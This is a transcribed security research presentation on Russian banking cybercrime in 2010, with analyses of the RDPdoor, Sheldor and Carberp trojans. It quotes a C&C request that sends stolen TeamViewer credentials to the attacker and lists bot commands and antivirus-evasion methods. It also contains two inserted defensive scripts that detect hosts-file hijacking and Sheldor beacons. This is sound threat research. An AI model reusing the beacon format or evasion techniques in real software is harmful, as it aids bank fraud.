
Cybercrime in Russia: Trends and Issues


This report focuses on the development of Russian cybercrime. Firstly, it summarizes the economic and geopolitical factors that underlie computer crime, and which must be taken into consideration by researchers seeking to predict upcoming developments in cybercrime and cybercrime targeting. It goes on to look at the other ways in which Russian presence in the criminal cybersphere can be tracked, considering the technical approaches used by hackers in the region, how they link with economic and geographic factors, as well as with the part played by law enforcement in the investigation of international computer crimes.
The presentation will cover the following topics:
1. How cybercrime is interlinked with economic and geographical factors in Russia. The implications of the banking and instant payment systems of the Russian Federation.
2. Law Enforcement. The laws that currently obtain in the area of Russian computer crime: Legal evasions and loopholes.
3. Technical trends. The use of botnets to steal money from the Internet banking system for corporate clients: Technological and statistical analysis of the malware families involved, the organizational structures of the perpetrators, and the calculation of damages.
4. Successfully prosecuted cases in 2010. Complex investigation: spam affiliates, the WinLock case and others.
5. How DDoS attacks and botnet operations in Russian networks were tracked in co-operation with the Russian honeynet Project.

Published in: Technology


  1. 1. Cybercrime in Russia: Trends and issues. Robert Lipovsky, Aleksandr Matrosov and Dmitry Volkov
  2. 2. This presentation is confidential and not subject to public disclosure
  3. 3. Agenda
     o General cybercrime trends in 2010
     o Most prevalent threats and incidents
     o Reasons for the incidents' growth
     o Evolution of the cash-out scheme
     o Legal evasions and loopholes
     o Successful criminal prosecutions
     o Analysis of malware used in the attacks
  4. 4. Group-IB
     o First and only public company in Russia engaged in digital crime investigation and computer forensics consulting
     o Established in 2003
     o Assistance to law enforcement authorities on particularly difficult cases
     o Partners and researchers in 48 countries
     o Russian HoneyPot-Net project
     o 24/7 monitoring and incident response
  5. 5. Cybercrime in 2010
     Global computer crime market turnover at 7 billion dollars
     Share of cybercriminals living in Russia estimated at 1.3 billion dollars, ~19% of global crime
     Cybercriminals from Russian-speaking countries: 2.5 billion dollars, ~36% of global crime
     * research report "The Russian cybercrime market in 2010: status and trends"
  6. 6. Most prevalent threats and incidents
     1. Fraud targeted at Russian banks and payment systems
     2. SMS fraud using premium numbers ("winlockers"/LockScreen trojans)
     3. DDoS attacks: growth in number and in power
     4. Unauthorized access to sensitive corporate information
     * research report "The Russian cybercrime market in 2010: status and trends"
  7. 7. Incident statistics by Group-IB forensic lab (bar chart, 2009 vs. 2010, by incident type: unauthorized access, brand attacks, DDoS, bank fraud). Share of cybercriminals living in Russia estimated to increase to 1.8 billion dollars in 2011 (vs. 1.3 billion in 2010). SMS fraud (LockScreens) not shown because the numbers are disproportionally greater.
  8. 8. DDoS attacks: Growth in number and power. Attackers DDoS a bank if a transaction exceeds 150 000 $. Most powerful attack: 100 Gb/sec (victims: UkrTelecom, Yandex, EvoSwitch, but the real target was a dating affiliate program).
  9. 9. SMS fraud using premium numbers: LockScreen malware
     o If your country is affected, please contact us for information
     o Group-IB developed a case-tutorial for this type of investigation
  10. 10. Reasons for the incidents' growth
     o Legal evasions and loopholes
     o Low cost of services in Russia
     o Lack of legal jobs for young IT specialists
     o High profit and minimum investments from cybercrime
     o Low information security vs. high cybercrime groups' activities
     o Shift of attack targets back to USSR :)
  11. 11. Cost of services in Russia
     Hacking of a website: from $50
     Guaranteed hack of a mailbox (Yandex, Mail, Rambler, Gmail): from $45
     Mobile phone bug: from 5000$
     SMS service bug: from 1000$
     Massive distribution of Trojan and spyware: from 20$ (1000 users)
     Spam services:
       o 400,000 companies - $55
       o 1,800,000 private persons - $100
       o 90,000 companies in St. Petersburg - $30
       o 450,000 private persons in Ukraine - $50
       o 6,000,000 private persons in Russia - $150
       o 4,000,000 emails on - $200
  12. 12. Evolution of the Cash-out scheme For amounts up to 40k $
  13. 13. Evolution of the Cash-out scheme For amounts 40-200k $
  14. 14. Evolution of the Cash-out scheme For amounts over 200k $
  15. 15. Chapter 28 of the Penal Code
     Article 272. Illegal Access to Computer Information. Criminal responsibility: maximum fine of 300 000 RUB or imprisonment for up to 5 years.
     Article 273. Development, Use and Spreading of Malicious Software. Criminal responsibility: imprisonment for up to 7 years.
     Article 274. Violation of Rules for the Operation of Computers, Computer Systems or Their Networks. Criminal responsibility: imprisonment for up to 4 years.
  16. 16. Legislative initiatives
     The Committee against Cyber-Crime at the Russian Association of Electronic Communication (RAEC)
     Improvement of Russian legislation in the field of cyber crimes
     Anti-SPAM legislation
     Support against online child pornography
  17. 17. Successful criminal prosecutions
     o Group-IB, Economic Crimes Division and Dept K MVD busted a group of cybercriminals who developed and spread the "LockScreen" malware
     o 10 cybercriminals have been arrested
  18. 18. Successful criminal prosecutions Leo Kuvaev case (BadCow)
  19. 19. Successful criminal prosecutions Leo Kuvaev case (BadCow)
  20. 20. Successful criminal prosecutions: DDoS case (Cxim)
     o Provided DDoS as a service
     o Arrested for DDoS against Russian banks
     o 8 months in jail
  21. 21. Successful criminal prosecutions: Russian bank-fraud case
     Group #1
       o stole 600 000$ in a single transaction
       o case in court
       o used Win32/Sheldor
     Group #2
       o stole 832 000$ (over 1 month)
       o case in court
       o used phishing sites (hosted on Gogax)
  22. 22. Interesting facts about Russian bank fraud
     1. Mass distribution since 2009
     2. Six cybercrime groups attacking Russian banks
     3. Maximum amount stolen at one time from a single bank account: 14 814 820$
  23. 23. Interesting facts about Russian bank fraud These guys are still free!
  24. 24. Analysis of malware used in the attacks on Russian Internet Banking systems
  25. 25. Overview
     2010: year of attacks on Russian banks
     • number of incidents has more than doubled compared to 2009*
     Over 95%* of incidents involve banking trojans
     Malware tailored to Russian banks and payment systems
     However!
     • Can be (and IS) used in other countries as well
     * research report "The Russian cybercrime market in 2010: status and trends"
  26. 26. Malware family share by incidents (%), in the last 6 months (bar chart, 0-40% axis; as investigated by Group-IB)
  27. 27. Most prevalent banking malware in Russia
     Malware family | Description
     Win32/RDPdoor  | Backdoor; uses MS Remote Desktop; botnet
     Win32/Sheldor  | Backdoor; abuses the TeamViewer application; botnet
     Win32/Carberp  | Universal trojan with modules for targeted attacks on Russian banks; botnet
     Win32/Hodprot  | Downloader; installs other malware modules; strong encryption of its C&C protocol
     Win32/Qhost    | Malware that modifies the hosts file
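The last row of the table, Win32/Qhost, works by rewriting the Windows hosts file so that a bank's hostname resolves to an attacker-controlled address. The check below is an added example written for this page (it is not code from the presentation, ESET or Group-IB): it parses hosts-file text and reports every entry that pins a watched banking or payment domain, since a legitimate hosts file never needs such an entry. The watched-domain list, the sample hosts content and the `198.51.100.23` address are constructed for the example.

```python
"""Flag Win32/Qhost-style hosts-file overrides of banking domains.

Added example (not code from the presentation or from ESET/Group-IB): a defender's
check that a Windows hosts file contains no entry for a bank or payment-system
domain. The watched domains and the hosts-file content below are constructed.
"""
import ipaddress
import sys

# Constructed list of domains that must never be resolved via the hosts file.
WATCHED_DOMAINS = {"online.bank.example", "pay.example.net"}

# Constructed hosts file: the normal loopback entries plus one injected redirect.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
198.51.100.23   online.bank.example www.online.bank.example   # injected line
"""


def parse_hosts(text):
    """Yield (ip, hostname) pairs from hosts-file text, skipping comments and blanks."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop trailing comments
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue                          # an address with no names is not an entry
        ip = fields[0]
        for name in fields[1:]:
            yield ip, name.lower()


def is_watched(name, watched):
    """True if name equals a watched domain or is a subdomain of one."""
    return any(name == d or name.endswith("." + d) for d in watched)


def find_hosts_overrides(text, watched):
    """Return hosts-file entries that pin a watched domain to any address.

    kind is "redirect" when the address is routable (the Qhost case: the victim
    is sent to a fake banking site) and "block" when it is loopback or
    unspecified (the victim is merely cut off from the real site).
    """
    hits = []
    for ip, name in parse_hosts(text):
        if not is_watched(name, watched):
            continue
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue                          # malformed address, not a usable entry
        kind = "block" if (addr.is_loopback or addr.is_unspecified) else "redirect"
        hits.append({"host": name, "ip": ip, "kind": kind})
    return hits


if __name__ == "__main__":
    # Usage: python hosts_check.py [path-to-hosts-file]; with no argument the
    # constructed sample is scanned.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_HOSTS
    for hit in find_hosts_overrides(text, WATCHED_DOMAINS):
        print(f"{hit['kind']:8} {hit['host']} -> {hit['ip']}")
```

On a live Windows system the file to pass in is `%SystemRoot%\System32\drivers\etc\hosts`; the watched set should be the institution's own domains plus any payment systems its customers use, and a non-empty result for a loopback or unspecified address is still worth a look because it cuts customers off from the real site.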
  28. 28. Win32/RDPdoor
  29. 29. Stealing money using MS Remote Desktop... Win32/RDPdoor overview
     Appearance: first samples detected in April 2010
     Cost: ~ 2.000$
     Key feature: abuses components of Thinsoft BeTwin for RDP
     • Most prevalent banking trojan in Russia
     • Bypassing advanced security mechanisms (smartcards, etc.)
  30. 30. Win32/RDPdoor detection statistics by country (cloud data from ThreatSense.Net, April 2010 – March 2011; pie chart legend): Russia, Ukraine, Kazakhstan, Belarus, Thailand, Bulgaria, United States, Israel, Moldova, Rest of the world
  31. 31. Win32/RDPdoor installation (exchange between the infected computer running Win32/RDPdoor and the C&C)
     1. Run dropper and send system information
     2. Authentication on C&C and provide Thinsoft BeTwin for installation
     3. Send status information
  32. 32. Win32/RDPdoor installation
  33. 33. Win32/RDPdoor installation
  34. 34. Stealing authentication data
     1. Install GINA extension DLL
     2. Display fake logon screen
     3. Capture user name & password
     4. Send to C&C
  35. 35. Win32/RDPdoor bot commands
     Bot command | Description
     "P" | change password for BeTwin terminal session
     "B" | reinstall BeTwinServiceXP module
     "S" | administration of BeTwin terminal session
     "R" | install BeTwinServiceXP module
     "T" | BeTwin backconnection initialization
     "U" | update main modules and configuration
  36. 36. Win32/RDPdoor bot commands
  37. 37. Win32/RDPdoor updating: a new dropper with a new configuration embedded is received after the "U" command
  38. 38. Win32/Sheldor
  39. 39. Win32/Sheldor overview
     Appearance: first samples detected in June 2010
     Cost: ~ 2.500$
     Key feature: abuses the TeamViewer application for remote access
     • Using the TeamViewer cloud adds another level of anonymity
  40. 40. Win32/Sheldor detection statistics by country (cloud data from ThreatSense.Net, April 2010 – March 2011; pie chart legend): Russia, Ukraine, Kazakhstan, Moldova, United States, China, Belarus, Israel, Georgia, Rest of the world
  41. 41. Win32/Sheldor and TeamViewer in action (diagram: infected computer running Win32/Sheldor, the TeamViewer cloud, and the C&C)
     1. Request cloud ID
     2. Set cloud ID
     3. Send ID to C&C: GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1
     4. Malicious connection
  42. 42. Win32/Sheldor and TeamViewer in action
     1. Request cloud ID
     2. Set cloud ID
     3. Send ID to C&C
     4. Malicious connection
     GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1
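Step 3 is the one a network defender can see: the bot hands its TeamViewer ID and session password to the C&C in a plain HTTP GET, so a proxy log records exactly which machine is now reachable through the TeamViewer cloud. The script below is an added example written for this page (not code from the presentation, ESET or Group-IB): it scans proxy log lines for requests with the `/getinfo.php?id=...&pwd=...&stat=...` shape shown on the slide and reports the client, the C&C host and the credentials that were disclosed. The log format, the sample lines and the `cc.example.invalid` hostname are constructed; only the query string on the slide is taken from the page.

```python
"""Spot Win32/Sheldor-style C&C check-ins in HTTP proxy logs.

Added example (not code from the presentation or from ESET/Group-IB). The deck
shows the bot reporting its TeamViewer ID and session password to its C&C as
GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1. This script finds proxy
log lines of that shape and reports the client, the C&C host and the
credentials that were handed over. The log format, sample lines and the
C&C hostname are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log: "<timestamp> <client-ip> <method> <url> <status>"
SAMPLE_LOG = """\
1302000001.123 10.0.0.15 GET http://example.org/index.html 200
1302000002.456 10.0.0.42 GET http://cc.example.invalid/getinfo.php?id=414%20034%20883&pwd=6655&stat=1 200
1302000003.789 10.0.0.42 GET http://cc.example.invalid/getinfo.php?id=414%20034%20883&pwd=6655&stat=0 200
1302000004.000 10.0.0.77 GET http://bank.example.org/getinfo.php?account=1 200
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)


def is_sheldor_beacon(url):
    """Return (teamviewer_id, password, stat) if url has the beacon shape, else None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/getinfo.php"):
        return None
    query = parse_qs(parts.query)
    if not all(key in query for key in ("id", "pwd", "stat")):
        return None
    # parse_qs turns %20 into spaces; the bot pads the ID as "414 034 883"
    tv_id = query["id"][0].replace(" ", "")
    password = query["pwd"][0]
    stat = query["stat"][0]
    # TeamViewer IDs are 9-10 digit numbers; the session password is numeric too
    if not re.fullmatch(r"\d{9,10}", tv_id) or not re.fullmatch(r"\d{4,}", password):
        return None
    return tv_id, password, stat


def scan_log(text):
    """Return one finding per log line that matches the beacon pattern."""
    findings = []
    for line in text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue                      # not a well-formed log line
        hit = is_sheldor_beacon(match["url"])
        if hit is None:
            continue
        tv_id, password, stat = hit
        findings.append({
            "ts": match["ts"],
            "client": match["client"],
            "cc_host": urlsplit(match["url"]).hostname,
            "teamviewer_id": tv_id,
            "pwd": password,
            "stat": stat,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} sent TeamViewer ID {f['teamviewer_id']} "
              f"(pwd {f['pwd']}, stat={f['stat']}) to {f['cc_host']}")
```

The match is deliberately on the request shape (path plus the three parameters with numeric values) rather than on a fixed C&C hostname, because the hostname is the part the operators change most often; the `stat` parameter is carried through unchanged so a responder can see repeated check-ins from the same client, and the fourth sample line shows that an unrelated `getinfo.php` on a legitimate site is not reported.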
  43. 43. Under the hood: DLL hooking. TeamViewer.exe -> TV.dll (proxy DLL) -> TS.dll (original TS.dll)
  44. 44. Malicious DLL call graph
  45. 45. Malicious DLL decompilation (annotated: functions for calling from original TS.dll; load original TS.dll; hook functions; C&C URL)
  46. 46. Win32/Sheldor bot commands
     Bot command | Description
     exec | download and ShellExecute/CreateThread additional module
     monitor_off | send command "stop monitoring" to C&C
     monitor_on | send command "start monitoring" to C&C
     power_off | ExitWindowsEx(EWX_POWEROFF, SHTDN_REASON_MAJOR_OPERATINGSYSTEM)
     shutdown | ExitWindowsEx(EWX_REBOOT, SHTDN_REASON_MAJOR_OPERATINGSYSTEM)
     killbot | delete all files, directories and registry keys
  47. 47. Sheldor C&C panel
  48. 48. Win32/Carberp
  49. 49. Win32/Carberp overview
     Appearance: first samples detected in February 2010
     Cost: ~ 9.000$
     Key feature: advanced information stealing trojan with plug-ins
     • Customizable to specific banks
     • Man-in-the-browser attacks (IE, FireFox)
     • Grand Theft: real cases with millions of $$$ stolen
  50. 50. Win32/Carberp detection statistics by country (cloud data from ThreatSense.Net, April 2010 – March 2011; pie chart legend): Russia, Ukraine, Spain, United States, Turkey, Kazakhstan, Italy, Mexico, Thailand, Netherlands, Argentina, Belarus, Greece, United Kingdom, Rest of the world
  51. 51. C&C panel: Bots by country
  52. 52. Win32/Carberp detections over time in RussiaCloud data from ThreatSense.Net April 2010 – March 2011
  53. 53. Win32/Carberp bot commands
     Bot command | Description
     update | Download new version of Carberp
     dexec/download | Download and execute PE file
     kill_bot/killuser | Delete trojan from the system; delete the user's Windows account (latest version)
     startsb/loaddll | Download DLL and load it into the trojan's memory address space
     grabber | Grab HTML form data and send to C&C
  54. 54. Win32/Carberp self-protection
     Self-protect method | Win32/Carberp.W | Win32/Carberp.X
     Bypassing AV emulators | many calls of GUI WinAPI functions | many calls of GUI WinAPI functions
     Code injection method | ZwResumeThread() | ZwQueueApcThread()
     Command and string encryption | custom encryption algorithm | 
     Bot authentication on C&C | file with authentication data stored on infected PC | 
     API function encryption | custom encryption algorithm | custom encryption algorithm
     Detection of AV hooks | comparison of the first original bytes | comparison of the first original bytes
     Bypassing static AV signatures | adds random junk bytes to dropped files | adds random junk bytes to dropped files
     Hiding in the system | hook system functions | hook system functions
  55. 55. Win32/Carberp distribution channels (diagram): direct distribution from the control panel, and distribution via partners ("partnerka", affiliate program, tracked by affiliate ID); both paths lead to an exploit pack. Partner traffic sources:
     • BlackHat SEO
     • Infected blogs
     • etc.
  56. 56. Win32/Carberp botnet control panel
  57. 57. Win32/Carberp control panel – Bank settings
  58. 58. Cab-files with stolen data
  59. 59. Stolen data: BS-Client IB system
  60. 60. Stolen data: CyberPlat payment system
  61. 61. Stolen data: iBank IB system
  62. 62. Stolen data: SberBank IB
  63. 63. Stolen data: UkrSibBank IB
  64. 64. Win32/Carberp summary
     Cybercrime kit using multiple stealing techniques
     Since early 2010 targeting other regions too
     Several independent cybercrime groups involved
     Joint investigation of Russian police, Group-IB and ESET
  65. 65. Summary
     | Win32/RDPdoor | Win32/Sheldor | Win32/Carberp
     First appearance | April 2010 | June 2010 | February 2010
     Cost | 2000 $ | 2500 $ | 9000 $
     Prevalence | Russia, Ukraine, Kazakhstan | Russia, Ukraine, Kazakhstan | Russia, Ukraine, Spain, USA
     Remote access | RDP via ThinSoft BeTwin | via TeamViewer | via plug-ins
     Information stealing | manually | manually | automated
     Plug-ins |  |  | 
     Complexity |  |  | 
     Botnet |  |  | 
  66. 66. Conclusion
     • Banks in other countries are becoming new targets of Russian cybercrime groups
     • Attackers respond to new security measures with new methods to bypass them
     • Cybercriminals use stolen money to stay out of jail
     • Disabling C&C servers is not enough to stop them
     • The only way of fighting them is by cooperation
  67. 67. Questions
  68. 68. Thank you for your attention ;) Robert Lipovsky, ESET Aleksandr Matrosov, ESET @matrosov Dmitry Volkov, Group-IB @groupib